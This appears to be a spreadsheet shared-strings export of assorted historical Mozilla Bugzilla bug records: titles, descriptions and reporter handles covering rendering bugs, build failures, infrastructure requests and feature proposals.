  <si>
    <t>I received the following email:
Hi *
the current version of http://mxr.mozilla.org/mozilla-central/source/netwerk/dns/src/effective_tld_names.dat?raw=1 contains:
// mv : http://en.wikipedia.org/wiki/.mv
*.mv
Google was able to register google.mv so I'm not sure if *.mv is still appropriate.
Gerv</t>
  </si>
  <si>
    <t>SEAMONKEY-150942</t>
  </si>
  <si>
    <t>Page not shown correctly</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:1.0.0) Gecko/20020530
BuildID:    20020530
If you take a look at the text boxes and tables you quickly find out it's a
mess. Showed fine in IE. NS Comm. showed everything even more messy.
Reproducible: Always</t>
  </si>
  <si>
    <t>samir_bugzilla</t>
  </si>
  <si>
    <t>matevz.jekovec</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-204407</t>
  </si>
  <si>
    <t>cleanup warnings in nsToolkit.cpp and nsLookAndFeel.cpp</t>
  </si>
  <si>
    <t>/swap/BEOS/mozilla/widget/src/beos/nsLookAndFeel.cpp:66: warning: unused variable `int idx'
/swap/BEOS/mozilla/widget/src/beos/nsToolkit.cpp:112: warning: long unsigned int format pointer arg (arg 3)
/swap/BEOS/mozilla/widget/src/beos/nsToolkit.cpp:113: warning: long unsigned int format pointer arg (arg 3)
/swap/BEOS/mozilla/widget/src/beos/nsToolkit.cpp:261: warning: long unsigned int format pointer arg (arg 3)
/swap/BEOS/mozilla/widget/src/beos/nsToolkit.cpp:262: warning: long unsigned int format pointer arg (arg 3)</t>
  </si>
  <si>
    <t>CORE-12665</t>
  </si>
  <si>
    <t>Tree Widget Column Resizing</t>
  </si>
  <si>
    <t>Tracking bug see dependency tree.</t>
  </si>
  <si>
    <t>trudelle</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-529169</t>
  </si>
  <si>
    <t>compile Fennec win32 desktop builds with VS8</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)
Build Identifier: 20091116022232
There is an error when run Fennec because MSVCR80.dll was not found. But browser works.
Reproducible: Always
Steps to Reproduce:
1.Run Fennec
2.
3.
Actual Results:  
There is a message window Unable To Locate Component
-This application has failed to start because MSVCR80.dll was not found. Re-installing the application may fix this problem.-</t>
  </si>
  <si>
    <t>darya.botova</t>
  </si>
  <si>
    <t>FIREFOX-355729</t>
  </si>
  <si>
    <t>Copy Plain Text extension not available/working for firefox 2</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061006 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061006 Minefield/3.0a1
https://addons.mozilla.org/firefox/134/
Contact: jeremy@mozmonkey.com
Reproducible: Always</t>
  </si>
  <si>
    <t>NSS-385642</t>
  </si>
  <si>
    <t>Add additional cert usage(s) for certutil's -V -u option</t>
  </si>
  <si>
    <t>Created attachment 269584
Add support for validating object signing usage with certutil -V
Nelson wrote on dev-tech-crypto:
&gt; You're right that the absence of any way to specify a
&gt; code-signing or object-signing usage is a deficiency of certutil's -u
&gt; option.  Please file a bug about this in bugzilla.
So here's the bug and a proposed patch. I chose J as the letter for object signing because both O and S are already used and J occurs in both obJect as well as in Jar - where such a cert also tends to be used...
In addition I added a diagnostic message when an incorrect option is supplied - with the current version certutil -V will just fail silently (it won't produce any output).
Finally I'm not sure if any other cert usage (besides ObjectSigner) should be added too... for the sake of completeness these are the remaining ones:
    certUsageSSLServerWithStepUp = 2
    certUsageSSLCA = 3
    certUsageUserCertImport = 7
    certUsageVerifyCA = 8
    certUsageProtectedObjectSigner = 9
    certUsageAnyCA = 11</t>
  </si>
  <si>
    <t>mbugz</t>
  </si>
  <si>
    <t>FIREFOX-350525</t>
  </si>
  <si>
    <t>New session restore API needs accompanying unit tests</t>
  </si>
  <si>
    <t>Bug 344640 added a lot of new API functionality to session restore. I think it would be cool if we could get unit tests for these APIs.
Something similar to what Dietrich did here would be nice: http://lxr.mozilla.org/seamonkey/source/browser/components/sessionstore/test/nsSessionStoreTest.xul</t>
  </si>
  <si>
    <t>CORE-398824</t>
  </si>
  <si>
    <t>smooth out status notifications</t>
  </si>
  <si>
    <t>We send a lot of notifications for status text and progress bars. With the rise of Web 2.0 many sites rely on several so-called widgets to populate a page. This makes our progress go backwards. On techcrunch.com our status bar changes directions 5 or 6 times.
This patch decreases notification frequency sends status text only when there is new text and prevents status bars from moving backwards.</t>
  </si>
  <si>
    <t>CORE-423342</t>
  </si>
  <si>
    <t>Assertion failure: JSVAL_IS_VOID(obj-&gt;fslots[JSSLOT_ARRAY_LOOKUP_HOLDER])</t>
  </si>
  <si>
    <t>Created attachment 309842
testcase (triggers a fatal assertion when loaded)
Loading the testcase in a Mac trunk debug build of Firefox triggers:
Assertion failure: STOBJ_GET_SLOT(obj JSSLOT_ARRAY_LOOKUP_HOLDER) == JSVAL_VOID at /Users/jruderman/trunk/mozilla/js/src/jsarray.c:669
Seems harmless in a nightly.
This assertion is part of array_lookupProperty which was added as part of bug 322889.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-356607</t>
  </si>
  <si>
    <t>Party Tool</t>
  </si>
  <si>
    <t>add a sort selector to the party list page</t>
  </si>
  <si>
    <t>We need to be able to sort parties by different bits. I propose location (alpha by country) date added date of party (with tba at the end) and name of party (for name of party we should exclude leading non-alpha characters so that for example __John's Party should be ordered with the other j parties not at the top of the list)</t>
  </si>
  <si>
    <t>BUGZILLA-220724</t>
  </si>
  <si>
    <t>Provide standalone bug submission program</t>
  </si>
  <si>
    <t>Eric and I have been hacking on a bug submission program written in Python. This
program provides a simple commandline interface to submit bugs to a Bugzilla
instance. 
We've agreed on the basic interface and I'm in the process of polishing it up
for submission.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-609047</t>
  </si>
  <si>
    <t>clear varnish cache for http://hg.mozilla.org/releases/l10n-mozilla-1.9.2/ja/ and all other japanese repos</t>
  </si>
  <si>
    <t>Please reset the varnish cache once again.
News at 11 this time it's http://hg.mozilla.org/releases/l10n-mozilla-1.9.2/ja/ that's missing 0ddd22bacdbf47eeac9ce3ce498991dcae448ef7.
First time I see this on a non-central repo. But still Japan.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-471207</t>
  </si>
  <si>
    <t>multiline imput field no way back</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b3pre) Gecko/20081226 SeaMonkey/2.0a3pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b3pre) Gecko/20081226 SeaMonkey/2.0a3pre
changing single input field in chatzilla to multi-line-field it is not possible to switch back
Reproducible: Always
Steps to Reproduce:
1. switch to multi-line-input-fiel in chatzilla (mouse / keyboard)
2. try to switch back (mouse / keyboard)
3.
Actual Results:  
switching back to single-input-field is not possible
Expected Results:  
it is always possible to switch back to single-input-field</t>
  </si>
  <si>
    <t>kavalec74</t>
  </si>
  <si>
    <t>CORE-248877</t>
  </si>
  <si>
    <t>Marquee tag screwup page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.8
When viewing the forum of this page in Mozilla/FireFox it wrongly justifies the 
marquee bit.
It shuold be on the left in a box of the same size of the menu part
In camino it works!
Reproducible: Always
Steps to Reproduce:
1.visit www.vwforum.nl
2.click on forums in the menu
Actual Results:  
Wrong layout of Page
Expected Results:  
Display the page correctly</t>
  </si>
  <si>
    <t>lars.maes</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-403923</t>
  </si>
  <si>
    <t>Investigate splunk server for QA machines</t>
  </si>
  <si>
    <t>[10:07]   I'd also like an internal logserver setup for all these machines to dump their results to
[10:07]   it'd cut down on the amount of local storage they'd need</t>
  </si>
  <si>
    <t>CORE-232742</t>
  </si>
  <si>
    <t>Mozilla incl. firebird does not build on Amd64 cpu</t>
  </si>
  <si>
    <t>I have just got a new amd64 bit system and naturally wanted to build mozilla on it.
I'm running gentoo linux in 64 bit mode and It comes with mozilla so I knew it
should work. However my own builds from cvs failed.
The gentoo ebuilds has some amd64 patches it applies to the mozilla source
before building it so I tried to manually apply the same patch to my cvs tree
and it worked for firebird (currently testing the suite)
I will attach the patch to this bugreport</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-477942</t>
  </si>
  <si>
    <t>Ludovic - VMWare Fusion License</t>
  </si>
  <si>
    <t>He needs a license.</t>
  </si>
  <si>
    <t>CORE-95888</t>
  </si>
  <si>
    <t>[mac-only] 134.5Mb XUL FastLoad File and/or hang</t>
  </si>
  <si>
    <t>i have been eagerly awaiting bug 68045 so i grabbed Mozilla/5.0 (Macintosh U
PPC en-US rv:0.9.3+) Gecko/20010817 to try out fastlad as soon as something
landed. got the build and rand it about a half dozen times to the point it
completes displaying www.mozilla.org while timing (14 to 22 seconds) then added
user_pref(nglayout.debug.disable_xul_fastload false) to my prefs.js and ran
once (28 seconds) twice (22 seconds) checked size of XUL FastLoad File and it
was about 7Mb and then a third time which took well over 30 seconds and
checked the fastload file again and it was 134.5Mb. first two times i ran it
only until www.mozilla.org had finished displaying. third time i am still
running it. only window i have opened except for two browsers was the Find in
this Page window which took about 10 seconds the first time.
something simmilar happend earlier in the day when i downloaded this build at
work... but maybe i will try to reproduce that later.</t>
  </si>
  <si>
    <t>nnooiissee</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-483426</t>
  </si>
  <si>
    <t>[10.4] Bookmark bar always has background window (pinstriped) appearance</t>
  </si>
  <si>
    <t>There have been a few random complaints about this on the forum but none of the people ever followed through.  However hendy noticed this when he last pulled out his G3 iBook for testing and made the sample page in the URL field.  You can see from his screenshot that 2.0* active windows have the inactive-style (pinstriped) bookmark bar instead of the former gradient bar.
The last two checkins that touched this code are bug 401340 and bug 417948 but both of them cross-landed so that makes them unlikely.  hendy was investigating and as of last night his working theory was maybe the differences in - (BOOL)hasUnifiedToolbarAppearance in BrowserWindow between branch and trunk could be the problem (those were introduced by bug 425519 on the trunk):
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/camino/src/browser/BrowserWindow.mm&amp;rev=1.38&amp;mark=199#199
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/camino/src/browser/BrowserWindow.mm&amp;rev=1.12.2.21&amp;mark=197#197</t>
  </si>
  <si>
    <t>CORE-150341</t>
  </si>
  <si>
    <t>[FIX]during login not able to type capital letters</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.0.0) Gecko/20020530
BuildID:    2002053012
during login not able to type  capital letters partially or fully
Reproducible: Always
Steps to Reproduce:
1.pl go to this URL and type any login name with fully or partially having
capital letters
2.
3.</t>
  </si>
  <si>
    <t>rrk9</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-406244</t>
  </si>
  <si>
    <t>mozilla europe : publish pages</t>
  </si>
  <si>
    <t>please publish revision 8422 for java link change on all of our release notes
http://viewvc.svn.mozilla.org/vc?view=rev&amp;revision=8422
Thanks</t>
  </si>
  <si>
    <t>TOOLKIT-394272</t>
  </si>
  <si>
    <t>Mingw build error in nsDownloadManager.cpp</t>
  </si>
  <si>
    <t>After updating my mingw build I get this build error:
/cygdrive/c/mozilla/mozilla/build/cygwin-wrapper g++ -mno-cygwin -o nsDownloadMa
nager.o -c  -DMOZILLA_INTERNAL_API -DOSTYPE=\WINNT5.1\ -DOSARCH=WINNT  -I../..
/../../dist/include/xpcom -I../../../../dist/include/string -I../../../../dist/i
nclude/rdf -I../../../../dist/include/uriloader -I../../../../dist/include/mimet
ype -I../../../../dist/include/necko -I../../../../dist/include/pref -I../../../
../dist/include/progressDlg -I../../../../dist/include/intl -I../../../../dist/i
nclude/windowwatcher -I../../../../dist/include/webbrowserpersist -I../../../../
dist/include/appshell -I../../../../dist/include/dom -I../../../../dist/include/
embed_base -I../../../../dist/include/alerts -I../../../../dist/include/storage
-I../../../../dist/include/xulapp -I../../../../dist/include   -I../../../../dis
t/include/downloads -I../../../../dist/include/nspr  -DMOZ_PNG_READ -DPNG_NO_MMX
_CODE -DMOZ_PNG_WRITE   -I../../../../dist/sdk/include       -fno-rtti -fno-exce
ptions -Wall -Wconversion -Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsy
nth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -pedantic -mms-b
itfields -pipe  -DDEBUG -D_DEBUG -DDEBUG_mw -DTRACING -g   -DMOZILLA_CLIENT -inc
lude ../../../../mozilla-config.h /cygdrive/c/mozilla/mozilla/toolkit/components
/downloads/src/nsDownloadManager.cpp
In file included from c:/mozilla/mozilla/toolkit/components/downloads/src/nsDown
loadManager.cpp:76:
c:/mozilla/mozilla/toolkit/components/downloads/src/nsDownloadScanner.h:12:19: m
soav.h: No such file or directory
In file included from c:/mozilla/mozilla/toolkit/components/downloads/src/nsDown
loadManager.cpp:76:
c:/mozilla/mozilla/toolkit/components/downloads/src/nsDownloadScanner.h:49: erro
r: `IOfficeAntiVirus' was not declared in this scope
c:/mozilla/mozilla/toolkit/components/downloads/src/nsDownloadScanner.h:49: erro
r: template argument 1 is invalid
c:/mozilla/mozilla/toolkit/components/downloads/src/nsDownloadScanner.h:49: erro
r: ISO C++ forbids declaration of `mAVScanner' with no type
make[6]: *** [nsDownloadManager.o] Error 1
make[6]: Leaving directory `/cygdrive/c/mozilla/mozilla/_firefox/toolkit/compone
nts/downloads/src'
make[5]: *** [libs] Error 2
make[5]: Leaving directory `/cygdrive/c/mozilla/mozilla/_firefox/toolkit/compone
nts/downloads'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/c/mozilla/mozilla/_firefox/toolkit/compone
nts'
make[3]: *** [libs_tier_toolkit] Error 2
make[3]: Leaving directory `/cygdrive/c/mozilla/mozilla/_firefox'
make[2]: *** [tier_toolkit] Error 2
make[2]: Leaving directory `/cygdrive/c/mozilla/mozilla/_firefox'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/cygdrive/c/mozilla/mozilla/_firefox'
make: *** [alldep] Error 2
C:\mozilla\mozilla&gt;</t>
  </si>
  <si>
    <t>CORE-16128</t>
  </si>
  <si>
    <t>Turning on JS_PARANOID_REQUEST dies immediately.</t>
  </si>
  <si>
    <t>If I build with the JS_PARANOID_REQUEST symbol then I die from my first
JS_NewContext() call.  Removing the check from JS_ClearRegExpStatics() seems to
make it all better...</t>
  </si>
  <si>
    <t>BUGZILLA-127507</t>
  </si>
  <si>
    <t>comments template adds one too many lines</t>
  </si>
  <si>
    <t>The comments template has:
    [% quoteUrls(comment.body) %]
which produces:
Comment of some sort
Because of the pre block this adds '\n  ' to the end of each comment.
We default to PRE_CHOMP which compresses the first one but not POST_CHOMP so
the end remains wrapped. Is there a reason for this?
The fix for this is trivial - either add POST_CHOMP =&gt; 1 into globals.pl or
just do it for this comment by adding a - before the %.
I prefer the first option and I didn't see anything which would break on it. It
is overridable on a case by case basis. Once we decide I'll attach a patch for
the chosen option.
Comments?</t>
  </si>
  <si>
    <t>CORE-523496</t>
  </si>
  <si>
    <t>DeCOM ns(I)CSSParser</t>
  </si>
  <si>
    <t>Created attachment 407432
patch
The attached patch deCOMtaminates and devirtualizes nsICSSParser.  The COM interface class nsICSSParser becomes a pointer-like wrapper class nsCSSParser which allows us to continue hiding all the implementation details in CSSParserImpl (which still exists but has no virtual methods anymore).  Also responsibility for recycling parser objects now rests with nsCSSParser.cpp rather than nsCSSLoader.cpp.  The bulk of nsCSSParser.cpp did not have to change at all.  The contents of nsCSSLoader.h have been folded into nsCSSLoader.cpp as nothing else needs to see them anymore.
From an external perspective most uses of nsICSSParser change from
   nsCOMPtr cssParser
   rv = cssLoader-&gt;GetParserFor(nsnull getter_AddRefs(cssParser))
   NS_ENSURE_SUCCESS(rv rv)
   rv = cssParser-&gt;ParseWhatever(...)
   NS_ENSURE_SUCCESS(rv rv)
   cssLoader-&gt;RecycleParser(cssParser)
to
   nsCSSParser cssParser(cssLoader)
   NS_ENSURE_TRUE(cssParser NS_ERROR_OUT_OF_MEMORY)
   rv = cssParser.ParseWhatever(...)
   NS_ENSURE_SUCCESS(rv rv)
If you don't have a nsICSSLoader object handy you can just construct the parser object with no arguments and it'll still participate in the recycling scheme.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-485477</t>
  </si>
  <si>
    <t>Talos reboots (20090326 edition)</t>
  </si>
  <si>
    <t>These three for starters please
 qm-mini-ubuntu02
 qm-pxp-trunk05
 qm-pxp-try01</t>
  </si>
  <si>
    <t>TOOLKIT-517133</t>
  </si>
  <si>
    <t>Get crash stats for X errors</t>
  </si>
  <si>
    <t>Often enough we get reports of X errors.  It would be nice to get some stats
to indicate which of these are causing frequent problems.  Currently GDK's
X error handler prints some helpful data to standard error and exits with
status 1.
We could get a first indication of where these errors are occurring using
XSetErrorHandler in nsAppRunner to set up a handler that calls abort() instead
of exit() after printing similar data.  Using abort would also often be more
helpful than exit even in non-crashreporter-enabled builds to make getting a
stack easier.
Eventually it would be even better to be able to report the error code and
request type code.  (These are asynchronous errors but enough X operations
require round trips that it is usually not too long before the error is
detected.)  This doesn't seem to be to different from CRT invalid parameter
handler reports (see bug 397199) so maybe something similar could be used.
Bug 510505 also looks like it would provide a way to do this.
Some might argue that we should attempt to continue from X Errors (bug 348463
and bug 210931).  I'm not sure how well this would work as GTK (and Mozilla)
are probably not expecting to continue after errors.  If we do try to continue
in release builds we should still catch these errors in debug builds.
However the first stage is probably to get data on how often these errors are
occurring.</t>
  </si>
  <si>
    <t>CORE-517802</t>
  </si>
  <si>
    <t>Scrolling repaints too much if the view is dirty</t>
  </si>
  <si>
    <t>Created attachment 401756
v1
STR:
 1. Open this page in Firefox.
 2. Start Quartz Debug and mark No delay after flash Flash screen updates
    and Autoflush drawing.
 3. Focus Firefox and scroll this page using the mouse wheel. Observe that even
    though the whole view flashes only the newly-revealed part is actually
    repainted.
 4. Scroll the page by dragging the scrollbar.
Expected results:
Only repaint where necessary.
Actual results:
The whole view is repainted at every scroll.
The attached patch fixes this by using a 10.5+-only API to scroll dirty rects.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-329871</t>
  </si>
  <si>
    <t>Add profile events to summarize client configuration</t>
  </si>
  <si>
    <t>See http://wiki.mozilla.org/Browser_Metrics:Data_Collectors#Profile</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-523020</t>
  </si>
  <si>
    <t>[pt-BR] Fennec (Firefox mobile) Web localization</t>
  </si>
  <si>
    <t>You will find in bug #522973 instructions about the pages to be localized for the Firefox mobile release planned this quarter (probably November/December).
The files are on the SVN repository in your locale folder preferably commit directly to SVN and once done inform in this bug.
Alternatively you can attach the files to this bug (either individually or as a zip archive).
If you attach individual .html files please attach them with the plain/text Mime format.
news and instructions affecting all locales will be posted and updated if necessary in the master bug (bug #522973)
Thanks!!</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-628797</t>
  </si>
  <si>
    <t>new system to host slave allocator</t>
  </si>
  <si>
    <t>I'd like to get a server set up to run slave allocator on.  Preferably dedicated hardware but not necessarily anything speedy - a recycled Mini would probably do the trick.  Distro is not critical - Linux would be nice Mac is OK.  Windows is out.
This machine will get traffic from all three datacenters but it is minimal traffic (one small HTTP request per slave reboot).  So for the moment it can be in whichever datacenter is most convenient.  As we examine load and redundancy we may branch it out into multiple servers.
Hostname should be something like shepherd-{mtvmptscl}.build.mozilla.org (as appropriate) with a CNAME slavealloc.build.mozilla.org pointing to the same A record.
I'm not sure what else you'll need to know.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-160758</t>
  </si>
  <si>
    <t>Buttons non-functional for FTP url login</t>
  </si>
  <si>
    <t>After entering a FTP address in the URL line I got a sheet that asked for a user
name and password. That worked fine but when I clicked to say ok nothing
happend. The same held for the cancel button. It appears as though these buttons
are non-functional.</t>
  </si>
  <si>
    <t>jnennemann</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-358139</t>
  </si>
  <si>
    <t>XTF</t>
  </si>
  <si>
    <t>Make sure that namespaced attributes aren't handled by nsIXTFElement objects</t>
  </si>
  <si>
    <t>Currently also namespaced attributes get handled by nsIXTFElement objects even though the API doesn't support them. 
I'm about to add xtf for namespaced attributes so that there shouldn't
be need to change nsIXTFElement API to support anything else but 
non-namespaced attributes.
Patch coming.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-499125</t>
  </si>
  <si>
    <t>File Browser keyboard navigation is slow</t>
  </si>
  <si>
    <t>If you open the file browser and navigate around with the keyboard the 
selection cursor moves around much more slowly than you'd want.</t>
  </si>
  <si>
    <t>dangoor</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-406053</t>
  </si>
  <si>
    <t>Force an initial update check to be stored</t>
  </si>
  <si>
    <t>Once again the fact that Sparkle was really designed for at-launch checking has bitten us unless someone either manually checks for an update or leaves Camino running all day they will never have an auto-update check because the no-previous-check-date handling starts a timer with the full interval on launch and doesn't write any pref out.
I'll either change Sparkle and try to push that upstream (if I think there's a reasonable general-purpose solution after looking at it more) or I'll have us manually force a date to be present in our own update-twiddling launch code.</t>
  </si>
  <si>
    <t>BUGZILLA-297747</t>
  </si>
  <si>
    <t>Update/Create the Release Info page(s) for 2.20rc1 and 2.18.2</t>
  </si>
  <si>
    <t>Basically for this we need new Release Info pages.
We need to actually complete the 2.20 release information before we release the
first RC which will be this one. That means that currently any dead links from
the 2.20 release info need to work. (That's mostly covered by other bugs such
as the Release Notes.) It also means that any links that are missing from that
page need to be there.
And of course we need a release info page for 2.18.2 similar to the one for
2.18.1.
And then the main Release Info page needs to be updated with the new information.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-410862</t>
  </si>
  <si>
    <t>Request for monitor desk mount</t>
  </si>
  <si>
    <t>The Ergotron LX Desk Mount Arm looks like it should do (link below). I'm at the back door of bldg S. 
http://www.cdw.com/shop/products/default.aspx?EDC=848020</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-488521</t>
  </si>
  <si>
    <t>A word on the splash screen of the installer is mistyped.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US) AppleWebKit/525.19 (KHTML like Gecko) Chrome/1.0.154.53 Safari/525.19
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 sr rv:1.9.1b3pre) Gecko/20090223 Thunderbird/3.0b2
Installer for serbian Thunderbird Beta 3.0 b2 has a mistyped word. It reads
Ð”Ð¾Ð±Ñ€Ð¾Ð´Ð¾ÑˆÑ‡Ð»Ð¸
and it should be
Ð”Ð¾Ð±Ñ€Ð¾Ð´Ð¾ÑˆÐ»Ð¸
Reproducible: Always
Steps to Reproduce:
1. Install serbian version of version 3 beta 2
2.
3.</t>
  </si>
  <si>
    <t>aleksandar.ristovski</t>
  </si>
  <si>
    <t>CORE-501371</t>
  </si>
  <si>
    <t>Poor SVG Performance</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1) Gecko/20090624 Firefox/3.5
The SVG Performance of Firefox 3.5 is pretty slow. The XHTML document on http://warsimulator.appspot.com/static/warsim.xhtml
is running quite good on Firefox 3.0.11 Safari 4 and Opera 10b. However the performance on 3.5 is reduced dramatically.
Reproducible: Always
Steps to Reproduce:
1. Go to http://warsimulator.appspot.com/static/warsim.xhtml 
2. Hover over the cells. The cell you are hovering over will be highlighted.
3. Click on a cell to select it and play around with the orange buttons on the top right. They will change the height and the terrain (The buttons on the top left don't have any function yet).
Actual Results:  
When hovering over the cells the window sometimes stalls for a few second.
When clicking the top left buttons it takes significant time to update the view.
Expected Results:  
It should work at least as fast as in 3.0.11. The latest releases of Opera and Safari are the reference how fast this can work.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-467485</t>
  </si>
  <si>
    <t>reftest crashtest and BrowserChrome broken on unittest mac since Shiretoko branding</t>
  </si>
  <si>
    <t>unittest hard codes Minefield.app in a few places and we have Shiretoko.app now so three of the test suites are broken there.
Trying a couple of runs with a symlink added manually eg in
moz2-darwin9-slave05:/builds/slave/trunk_darwin-5/build/objdir/dist/ from Minefield.app to Shiretoko.app
Similar to bug 456281 but I didn't want to push all of that out because it's not clear if any testing has been done in staging.</t>
  </si>
  <si>
    <t>THUNDERBIRD-227688</t>
  </si>
  <si>
    <t>Constant hour glass after Panda removes swen virus</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007 Netscape/7.1 Firebird/0.7
Build Identifier: Mozilla Thunderbird 0.3 (20031013)
Hi All
    I have been doing some testing on Windows XP Professional Sp1a 
with Panda Software's Titanium and Platinum Antivirus.  A 30 day
eval can be downloaded from:
           http://www.pandasoftware.com/products/home_users.asp
    What I found with Thunderbird 0.3 (20031013) is that the hour
glass stays on over the inbox and the inbox is not accessible (all
other boxes are) after Panda has removed an incoming virus
from my mail server.  (Panda has a pop up that tells you the 
particulars.)  In this case it was multiple versions of the Swen virus.
    If I exit and restart Thunderbird everything is back to normal
except that the viruses are missing or zeroed out from my inbox.
no corruptions at all -- very slick.
   But I am concerned about 1) those who do not realize that they 
have to exit and restart and 2) those of us that get about 30 viruses
sent to them a day and get annoyed about having to constantly
restart every time they read their mail.  (My Junk filter can handle
Swen just fine!)
Many thanks
--Tony
aewell@gbis.com
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-60486</t>
  </si>
  <si>
    <t>onLoad doesn't work when there is an anchors in the URL</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.7 [en] (Win95 I)
BuildID:    2000111620
The onLoad handler isn't triggered when a HTML page is first loaded if it's URL 
has an anchor extension on the end to go to a selected point in the document
Reproducible: Always
Steps to Reproduce:
1. Goto http://booth.lse.ac.uk/test/browsers/mozilla_onload_bug.html
2. Click on first link and see that nothing happens when the page loads
3. Go back
4. Click on the link again it still doesn't work
5. Go back
6. Click on the second link and it does work but that is because the URL doesn't 
use an anchor
Actual Results:  It doesn't execute the defined onLoad handler
Expected Results:  Displayed an alert box</t>
  </si>
  <si>
    <t>nisheeth_mozilla</t>
  </si>
  <si>
    <t>ajm194</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-211952</t>
  </si>
  <si>
    <t>Modify SQL: Native Database Support component</t>
  </si>
  <si>
    <t>I'd like to unify terminology a bit so it would be better to call it just SQL
component.
and it would be also good to change the description:
-For bugs in Mozilla's native SQL support. (more info)
+For bugs in Mozilla's SQL support. See the project page for more details.
project page should point to http://www.mozilla.org/projects/sql/
Thanks</t>
  </si>
  <si>
    <t>CORE-397803</t>
  </si>
  <si>
    <t>Add test IDN TLDs to whitelist</t>
  </si>
  <si>
    <t>ICANN are starting a test of IDN in the root. 
http://icann.org/announcements/announcement-2-19jun07.htm
This involves adding 11 test TLDs to the root so software can be tested to see if it works with them.
We should add these 11 test TLDs to our IDN whitelist to allow Firefox users to participate fully in the test. Once the TLDs are removed from the root at the end of the test period we can remove them again.
The TLDs are the word test translated into the 11 languages in question. (I won't paste the characters in here.) Obviously we need to add them to the whitelist in their punycode forms.
Arabic:               xn--kgbechtv 
Chinese simplified:  xn--0zwm56d 
Chinese traditional: xn--g6w251d 
Greek:                xn--jxalpdlp 
Devenagari:           xn--11b5bs3a9aj6g 
Japanese:             xn--zckzah 
Korean:               xn--9t4b11yi5a 
Persian:              xn--hgbk6aj7f53bba 
Russian:              xn--80akhbyknj4f 
Tamil:                xn--hlcj6aya9esc7a 
Yiddish:              xn--deba0ad
Gerv</t>
  </si>
  <si>
    <t>CORE-314092</t>
  </si>
  <si>
    <t xml:space="preserve"> should prefer to be in the body</t>
  </si>
  <si>
    <t>Tor was complaining about this on IRC and it makes sense so here's a bug to make it so.</t>
  </si>
  <si>
    <t>CORE-528857</t>
  </si>
  <si>
    <t>nanojit: mismanagement of name lifetimes with TMFLAGS=assembly?</t>
  </si>
  <si>
    <t>I'm seeing some screwy behaviour with TMFLAGS=assembly.  Names get associated with instructions for the debug output.  AFAICT memory holding LIR is being recycled -- eg. different instructions in different fragments that are compiled at different times may end up at the same address in memory.  However the LirNameMap seems to be staying live across the compilation of these different fragments and so inappropriate names are being given to instructions in the second fragment.
I've attached some output that shows this.  First I turned off addName() which manually names some interesting instructions because it just confuses things.  'xt69' is the instruction name of interest.  It appears in a fragment on line 3881:
  0x9fc5d90: xt69: xt eq136 -&gt; pc=0x9febb2f imacpc=(nil) sp+56 rp+0 (GuardID=094)
'xt69' is an appropriate name for a LIR_xt instruction.  'xt69' appears again a couple of fragments later:
  0x9fc5d90: xt69 = int 12
I added some code to print the address of LIR_xt and LIR_int instructions and you can see it's the same address ie. the memory has been recycled.  But the LirNameMap seemingly hasn't been recycled so 'xt69' is still associated with addres 0x9fc5d90 even thought the LIR instruction at that location has changed and we use it inappropriately.
